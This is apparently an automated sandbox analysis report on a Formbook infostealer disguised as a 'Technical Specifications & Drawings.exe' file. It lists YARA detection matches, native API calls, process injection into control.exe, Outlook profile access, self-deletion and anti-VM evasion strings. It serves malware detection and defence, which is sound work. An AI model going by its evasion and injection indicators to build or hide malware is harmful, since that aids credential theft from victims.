          Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: Technical Specifications & Drawings.exe PID: 6080, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: Technical Specifications & Drawings.exe PID: 5084, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: control.exe PID: 1896, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 0_2_00E7CD04
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 0_2_00E7F0D0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 0_2_00E7F077
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 0_2_028E0C10
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 0_2_028E0C40
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 0_2_028E40D1
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_017C4120
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_017AF900
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_017C99BF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_018720A8
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_017CA830
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_018728EC
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_01861002
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_0187E824
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_017D20A0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_017BB090
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_017CAB40
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_0186DBD2
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_018603DA
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_018523E3
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_017DABD8
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_01872B28
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_017DEBB0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_018722AE
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_01864AEF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_0185FA2B
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_01862D82
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_017A0D20
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_018725DD
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_01872D07
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_017BD5E0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_01871D55
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_017D2581
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_01864496
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_017B841F
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_0186D466
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_0187DFCE
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_01871FF1
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_017C6E30
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_01872EF7
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_0186D616
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: String function: 017AB150 appears 133 times
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_017E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_017E99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_017E9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_017E9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_017E98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_017E9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017EB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017EA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9560 NtWriteFile,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017EAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017EA770 NtOpenThread,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017EA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E96D0 NtCreateKey,
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.263993924.00000000029B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWebName.dll4 vs Technical Specifications & Drawings.exe
          Source: Technical Specifications & Drawings.exe, 00000000.00000000.238895450.00000000004C6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFileSh.exeB vs Technical Specifications & Drawings.exe
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.276069305.00000000070C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDoncepre.dll@ vs Technical Specifications & Drawings.exe
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDoncepre.dll@ vs Technical Specifications & Drawings.exe
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.275768947.0000000006F70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameWebName.dll4 vs Technical Specifications & Drawings.exe
          Source: Technical Specifications & Drawings.exe, 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Technical Specifications & Drawings.exe
          Source: Technical Specifications & Drawings.exe, 00000004.00000003.261218393.0000000001562000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Technical Specifications & Drawings.exe
          Source: Technical Specifications & Drawings.exe, 00000004.00000003.263343456.0000000001702000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Technical Specifications & Drawings.exe
          Source: Technical Specifications & Drawings.exeBinary or memory string: OriginalFilenameFileSh.exeB vs Technical Specifications & Drawings.exe
          Source: Technical Specifications & Drawings.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Technical Specifications & Drawings.exeVirustotal: Detection: 32%
          Source: Technical Specifications & Drawings.exeReversingLabs: Detection: 21%
          Source: Technical Specifications & Drawings.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\Technical Specifications & Drawings.exe "C:\Users\user\Desktop\Technical Specifications & Drawings.exe"
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess created: C:\Users\user\Desktop\Technical Specifications & Drawings.exe C:\Users\user\Desktop\Technical Specifications & Drawings.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess created: C:\Users\user\Desktop\Technical Specifications & Drawings.exe C:\Users\user\Desktop\Technical Specifications & Drawings.exe
          Source: C:\Windows\SysWOW64\control.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Technical Specifications & Drawings.exe.logJump to behavior
          Source: C:\Windows\SysWOW64\control.exeFile created: C:\Users\user\AppData\Local\Temp\207G7-97PJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/2@14/6
          Source: Technical Specifications & Drawings.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: Technical Specifications & Drawings.exe, ProcExpGUI/Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 0.0.Technical Specifications & Drawings.exe.400000.0.unpack, ProcExpGUI/Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Windows\SysWOW64\control.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: Technical Specifications & Drawings.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Technical Specifications & Drawings.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: wntdll.pdbUGP source: Technical Specifications & Drawings.exe, 00000004.00000003.260883902.000000000144C000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000003.262790961.00000000015E3000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.349077296.000000000423C000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.346500614.000000000409E000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.515758890.00000000044EF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.513604126.00000000043D0000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Technical Specifications & Drawings.exe, Technical Specifications & Drawings.exe, 00000004.00000003.260883902.000000000144C000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000003.262790961.00000000015E3000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.349077296.000000000423C000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.346500614.000000000409E000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.515758890.00000000044EF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.513604126.00000000043D0000.00000040.00000800.00020000.00000000.sdmp

          Data Obfuscation

Source: Technical Specifications & Drawings.exe, ProcExpGUI/Form1.cs | .Net Code: WaitHandle System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.Technical Specifications & Drawings.exe.400000.0.unpack, ProcExpGUI/Form1.cs | .Net Code: WaitHandle System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 0_2_028EEFEA pushad ; retf
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 0_2_028EF78A pushad ; iretd
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_017FD0D1 push ecx; ret
Source: initial sample | Static PE information: section name: .text entropy: 7.780783068719605

          Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\control.exe | File deleted: c:\users\user\desktop\technical specifications & drawings.exe
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\control.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

Source: Yara match | File source: 00000000.00000002.264997908.0000000002BA2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Technical Specifications & Drawings.exe PID: 6080, type: MEMORYSTR
Source: Technical Specifications & Drawings.exe, 00000000.00000002.264997908.0000000002BA2000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
Source: Technical Specifications & Drawings.exe, 00000000.00000002.264997908.0000000002BA2000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe TID: 6116 | Thread sleep time: -45877s >= -30000s
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe TID: 3116 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 1972 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_01875BA5 rdtsc
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | API coverage: 4.0 %
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Thread delayed: delay time: 45877
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Thread delayed: delay time: 922337203685477
Source: explorer.exe, 00000005.00000000.306843353.00000000080ED000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000005.00000000.286686271.0000000008223000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*^d
Source: explorer.exe, 00000005.00000000.309044837.0000000008476000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: lume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
Source: Technical Specifications & Drawings.exe, 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000005.00000000.320624186.0000000000680000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: _VMware_SATA_CD00#5&280b647&
Source: explorer.exe, 00000005.00000000.320680950.000000000069D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Technical Specifications & Drawings.exe, 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware
Source: explorer.exe, 00000005.00000000.286686271.0000000008223000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000005.00000000.286686271.0000000008223000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}t]
Source: explorer.exe, 00000005.00000000.327010240.00000000062C4000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.286686271.0000000008223000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+]e
Source: explorer.exe, 00000005.00000000.323194447.0000000004287000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
Source: explorer.exe, 00000005.00000000.330711449.000000000820E000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: Technical Specifications & Drawings.exe, 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware SVGA II
